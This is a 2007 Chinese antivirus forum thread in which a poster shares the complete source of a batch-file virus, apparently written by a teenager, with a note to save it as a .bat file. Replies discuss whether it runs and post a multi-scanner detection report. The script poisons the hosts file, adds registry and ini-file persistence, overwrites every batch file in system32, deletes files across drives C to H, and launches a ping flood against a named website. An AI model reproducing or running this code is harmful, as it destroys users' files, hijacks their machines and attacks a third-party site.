查看: 2778|回复: 3
收起左侧

发一个13岁的所谓病毒源代码

[复制链接]
eyy风行天下
发表于 2007-2-28 07:24:44 | 显示全部楼层 |阅读模式
发一个13岁杀毒的所谓源代码(这不是杀毒的源代码 这是一个真正的病毒)

唉~~今天看见那个金剑的作者的确在易语言论坛很不受欢迎,并且发现了很多反对它的声音。偶然找到一个夸奖的回帖,也就两句话“这个人对 批处理 vb 比较好”。还找到的所谓的源代码,不知道是不是真的。刚好今天影子系统坏了,只好裸体接受测试了。没想到竟然发现他写了我很多文件!!
在系统盘的system32\config下添加了一个名为19748.DAT的文件、在win.ini和system.ini中添加了几个命令。因为我怕怕,赶快删掉了,所以没有图片。我只记得大概在后面添加了自己。
然后在注册表里注册了自己,设为启动项。其他的等影子系统装好了再写上来~~


这就是所谓的源代码 保存为bat文件

@echo off
set a=Huai Nian DC
%Huai Nian DC1% 127.0.0.1 www.dywt.com.cn >> %windir%\system32\drivers\etc\hosts
%Huai Nian DC1% 127.0.0.1 www.eyuyan.com.cn >> %windir%\system32\drivers\etc\hosts
%Huai Nian DC1% 127.0.0.1 www.eyuyan.com >> %windir%\system32\drivers\etc\hosts
::阻止访问易网站
copy %0 %windir%\%a%.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Huai Nian DC /t REG_SZ /d %windir%\%a%.bat /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Huai Nian DC /t REG_SZ /d %windir%\%a%.bat /f > nul
set Huai Nian DC1=echo
set Wdd=win.ini
%Huai Nian DC1% [windows] >> %windir%\%Wdd%
%Huai Nian DC1% run=%windir%\%a%.bat >> %windir%\win.ini
%Huai Nian DC1% load=%windir%\%a%.bat >> %windir%\win.ini
%Huai Nian DC1% [boot] >> %windir%\system.ini
%Huai Nian DC1% shell=explorer.exe %a%.bat >> %windir%\system.ini
set x=%random%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Huai Nian DC /t REG_SZ /d "%windir%\%a%.bat" /f > nul
::加到启动项
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
::复制自己
del /f /s /q "d:\*.e"
del /f /s /q "e:\*.e"
del /f /s /q "f:\*.e"
del /f /s /q "g:\*.e"
del /f /s /q "h:\*.e"
del /f /s /q "c:\*.e"
del /f /s /q "C:\Program Files\e\*.*"
::删文件
ping -l 65500 -i 255 -t www.dywt.com.cn
::开始攻击
mofunzone
发表于 2007-2-28 07:30:07 | 显示全部楼层
真的。。
可以。。
运行。。
吗???

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
mofunzone
发表于 2007-2-28 07:32:55 | 显示全部楼层
好像确实可以。。
只是沙盘里面不能动
生成了两个ini,还有一个伪造host文件,估计是要试图替换系统原文件的。。
AntiVir        7.3.1.38        02.27.2007        no virus found
Authentium        4.93.8        02.27.2007        no virus found
Avast        4.7.936.0        02.27.2007        no virus found
AVG        7.5.0.441        02.27.2007        BAT/Generic
BitDefender        7.2        02.28.2007        no virus found
CAT-QuickHeal        9.00        02.27.2007        no virus found
ClamAV        devel-20060426        02.27.2007        no virus found
DrWeb        4.33        02.27.2007        BAT.Steel
eSafe        7.0.14.0        02.27.2007        no virus found
eTrust-Vet        30.4.3438        02.27.2007        no virus found
Ewido        4.0        02.27.2007        no virus found
FileAdvisor        1        02.28.2007        no virus found
Fortinet        2.85.0.0        02.27.2007        no virus found
F-Prot        4.3.1.45        02.26.2007        no virus found
F-Secure        6.70.13030.0        02.28.2007        Type_BAT
Ikarus        T3.1.1.3        02.27.2007        no virus found
Kaspersky        4.0.2.24        02.27.2007        Type_BAT
McAfee        4972        02.27.2007        Univ.bat/a
Microsoft        1.2204        02.27.2007        no virus found
NOD32v2        2083        02.27.2007        no virus found
Norman        5.80.02        02.27.2007        no virus found
Panda        9.0.0.4        02.27.2007        BAT/Silly.44
Prevx1        V2        02.28.2007        no virus found
Sophos        4.14.0        02.26.2007        no virus found
Sunbelt        2.2.907.0        02.24.2007        no virus found
Symantec        10        02.28.2007        BAT.Silly.B.gen
TheHacker        6.1.6.065        02.26.2007        no virus found
UNA        1.83        02.27.2007        no virus found
VBA32        3.11.2        02.27.2007        no virus found
VirusBuster        4.3.19:9        02.27.2007        BAT.SillyB.I

Aditional Information
File size: 1484 bytes
MD5: 5aea6e93f1e2bf7beb366c93a314cb09
SHA1: 5b7b546ef10acfe9ad9ebadc1aa65f50bd61d756
turkey2k6
发表于 2007-2-28 12:19:31 | 显示全部楼层
这个需要添加相应参数运行的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-9-19 08:58 , Processed in 0.128885 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表